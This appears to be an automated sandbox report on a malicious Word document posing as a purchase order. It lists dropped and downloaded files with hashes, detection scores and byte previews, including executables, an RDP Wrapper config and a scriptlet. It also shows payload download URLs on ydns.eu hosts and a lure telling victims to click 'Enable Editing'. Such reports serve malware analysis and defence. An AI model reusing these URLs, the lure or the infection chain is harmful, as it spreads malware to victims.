                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Program Files\Microsoft DN1\rdpwrap.ini
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):181846
                                Entropy (8bit):5.421809355655133
                                Encrypted:false
                                SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                                MD5:6BC395161B04AA555D5A4E8EB8320020
                                SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                                SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                                SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                                Malicious:false
                                Reputation:unknown
                                Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                C:\Program Files\Microsoft DN1\sqlmap.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):116736
                                Entropy (8bit):5.884975745255681
                                Encrypted:false
                                SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                MD5:461ADE40B800AE80A40985594E1AC236
                                SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 20%, Browse
                                • Antivirus: ReversingLabs, Detection: 43%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                C:\ProgramData\images.exe
                                Process:C:\Users\user\AppData\Roaming\putty.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_11.00.14
                                Process:C:\ProgramData\images.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.2566267151938755
                                Encrypted:false
                                SSDEEP:3:ilsVeJ7lfo0eF2PNylRflyQHAnyWdl+SliXln:ilKSNombQgyWn+Sk1
                                MD5:9DD34F139B8B7D0FC865CDE6027043FB
                                SHA1:F9098E55DD0B2F83C8C58E117804F12DCAEA8D93
                                SHA-256:96BE75D129E470DEEBADA5AD99013E91F0454306B24650A6BC043C1B22A40D46
                                SHA-512:7031A0A6EE90FB6C9725232BEF9EE93574E8DC6A77B0DECBC3EF2B7FBB23966E5F3C0BCF1AD30C1892B9E8437377A893201B8E10B94763EB34477D13BAD2A121
                                Malicious:false
                                Reputation:unknown
                                Preview: ..{.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                IE Cache URL:http://hutyrtit.ydns.eu/microC.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                IE Cache URL:http://newhosteeeee.ydns.eu/putty.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11DB366A.png
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9029FF63.wmf
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
                                Category:dropped
                                Size (bytes):3730
                                Entropy (8bit):5.027033050759854
                                Encrypted:false
                                SSDEEP:48:5Wik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fo:Jk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DA
                                MD5:5648227A1DC795BD5B4961DAD493E795
                                SHA1:1611B47CE3F0AD0D19EEE0E27AB2CF3A8190B0D7
                                SHA-256:200124261ED676F6C2D812191655E2EC735897137E93ED676BD22AD6E455FC7A
                                SHA-512:3714019501B872EC8D514909F21108611A79C65C204C8251F01338CDDF76CB32BFDB2BB1CF3545E0A1D1D88549954F5F7999B9EE05A053FF73E323560B4FFB14
                                Malicious:false
                                Reputation:unknown
                                Preview: ..................................5...........................Segoe UI....C......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2631CAF7-C3D4-4848-8C82-E142953DDA5E}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):44618
                                Entropy (8bit):2.916482234929812
                                Encrypted:false
                                SSDEEP:768:Dr/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:nFia0Dqeb0nstw29rVzWSgm58F
                                MD5:CFD90F1E4A07FBF4850CB646C76C0AC9
                                SHA1:E9692ED21B6AFE1B5D587ECA5A20330676ED3325
                                SHA-256:0989F417091A5262338DEACB63FA9D9129741D9C862B67E6F8060DB43E67BAAE
                                SHA-512:53383F93D07DDE48873F5CA2069F1F653723B20BC7BC51C78530B628764243C2622E54C0545D83D14AEAC0521F018EBE490A20F1DB63446EA70943871A541A86
                                Malicious:false
                                Reputation:unknown
                                Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.d.g.h.g.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.N.d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.3573187972516119
                                Encrypted:false
                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb3:IiiiiiiiiifdLloZQc8++lsJe1MzK/
                                MD5:CD4DCADB7EAF8EBC3C0D123D947A31DC
                                SHA1:37AFAD9A59B5EF6715E976B43C141DA08A1758A5
                                SHA-256:0AA54F5023AB6361CC2ACD4C28F082149BA87BDC042BA7374CD02AFCAA01B5F1
                                SHA-512:30B40C28DCDED02E8FFCE1BF40777B76D904C1EC1D2D5DFD3E18BB3B783E6CD8B6AD76D9733ACF32E2FD01140AF54FF134FBE10F5615407E8B078BAC093E82CB
                                Malicious:false
                                Reputation:unknown
                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:unknown
                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):5.821101833795217
                                Encrypted:false
                                SSDEEP:384:3ymxaIgzzacasapa2hoygn1VYdNl6UnRJbtqEEE6oEaE3/nh:3ymxaPzacasapa2vgnrYdNl6Un7ZFPWb
                                MD5:EAF98295C742E17B01760B98BDB04235
                                SHA1:E729C9F20DCF8AC722517FCADD4D87BEDE21F49E
                                SHA-256:4F4EAAF614069BBFC3977DB75BD69A32A4BA95E5AD1A8B28348E4051A16D10A6
                                SHA-512:E2BDF0C22670A538D38A8AD8C0AA9DF59B253BDF3C49CA4724650382F490642C99134024F13AAD64B02D5EDC42B6A4759D10156ABE1E9274DC977C2270C57E48
                                Malicious:true
                                Reputation:unknown
                                Preview: ..<scriptleT.. >.. .......................... .............. ................. ........ ................. ...... ..............'... .............. ........... ........... ................... ...... ........ ........... ............ ...... .................... ........... ............ ...... ............'... ............................ ...... ........ ........... ................. ...... ........... ........ ...................... .................... ......... ......................... ..
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT:Zone.Identifier
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27
                                Entropy (8bit):3.9582291686698787
                                Encrypted:false
                                SSDEEP:3:gAWY3W:qY3W
                                MD5:833C0EFD3064048FD6A71565CA115CCD
                                SHA1:0E6D2A1D4B6AFA705EA6267EEED3655FD2B39B9D
                                SHA-256:4A86B6E7D2544AFC717EAC2B60ADBED0F0C68D49D723B2123F65C64C76579FBF
                                SHA-512:536C2BB6ED98C190CE98BE01A31BD05FE03D90532B5B4194CAA58671F43AD4D65F7F828D8AC1F43A6A13DCA581205416DA094CA4DACAEFACB8D901FC48CCEB7A
                                Malicious:false
                                Reputation:unknown
                                Preview: [ZoneTransfer]..ZoneId=3..3
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwh:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                                MD5:0FBED11864C03FDED0E70014DCF84578
                                SHA1:453723D938A03252F705B0A104986FE4C5CA7056
                                SHA-256:70F5E49EE3091777827ED661B63842061220C899A708860986E9AA1BD87C5004
                                SHA-512:DB53E3F1D18171F1D86C1B9BBF6BBD07153FC3E561834A35834BC0CA1E034FEDCD83AAAE7EDF9262C4E175C3D2287B647F55282E49627EAAF587F43714204667
                                Malicious:false
                                Reputation:unknown
                                Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:International EBCDIC text, with no line terminators, with overstriking
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:fw8:L
                                MD5:D3A8D9A8FD8375694BCBA2EC51445C4C
                                SHA1:A03346DBB4462D95874BDDCAD43170DCEEEF6D43
                                SHA-256:70665DB3A770558DC9DABFA25D640E9FF4692BA75CCF7975C726786ACA624582
                                SHA-512:EE6A992578524486D72CBCBF2240C3A0FE32A1C4AD72736B7834E22741A223BBF233BAECFF2A0460A6D60E9ED7023F25D62650257E2121ECC4AF34D0C7ADA628
                                Malicious:true
                                Reputation:unknown
                                Preview: ...o.U.H
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bak
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYk:RzWDI3
                                MD5:ACD3FB4310417DC77FE06F15B0E353E6
                                SHA1:80E7002E655EB5765FDEB21114295CB96AD9D5EB
                                SHA-256:DC3AE604991C9BB8FF8BC4502AE3D0DB8A3317512C0F432490B103B89C1A4368
                                SHA-512:DA46A917DB6276CD4528CFE4AD113292D873CA2EBE53414730F442B83502E5FAF3D1AE87BFA295ADF01E3B44FDBCE239E21A318BFB2CCD1F4753846CB21F6F97
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\settings.bin
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:9bzY6oRDIvYVsRLY6oRDT6P2bfVn1:RzWDIfRWDT621
                                MD5:BB0F9B9992809E733EFFF8B0E562CFD6
                                SHA1:F0BAB3CF73A04F5A689E6AFC764FEE9276992742
                                SHA-256:C48F04FE7525AA3A3F9540889883F649726233DE021724823720A59B4F37CEAC
                                SHA-512:AE4280AA460DC1C0301D458A3A443F6884A0BE37481737B2ADAFD72C33C55F09BED88ED239C91FE6F19CA137AC3CD7C9B8454C21D3F8E759687F701C8B3C7A16
                                Malicious:false
                                Reputation:unknown
                                Preview: 9iH...}Z.4..f..J".C;"a9iH...}Z.4..f.~a........~.~.......3.U.
                                C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\storage.dat
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                                MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                                SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                                SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                                SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                                Malicious:false
                                Reputation:unknown
                                Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NEW PO1100372954 -.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Mon Aug 2 16:59:36 2021, length=234750, window=hide
                                Category:dropped
                                Size (bytes):2108
                                Entropy (8bit):4.563563676778922
                                Encrypted:false
                                SSDEEP:48:8it+/XT0jFx1aCZwfY2it+/XT0jFx1aCZwfc:8it+/XojFHDwfY2it+/XojFHDwfc
                                MD5:63DA06EC5F4B14A27137DD323B31070F
                                SHA1:CC221AF186196FB5381FCFEB99E975DAC5666D43
                                SHA-256:9E42FBE9B5CFF3DD2749ABC139522936D6BCB28E5FB70D919750E51F80768895
                                SHA-512:D8DB266A0FA3B50F475FE5FA5463751147B3F74BD2BA91CEE3CDEEB23B434CE8BCCC8089CCB4718A3C57CD433D73D329B104CAF3B454159F3BF3EDA4796BCC96
                                Malicious:false
                                Reputation:unknown
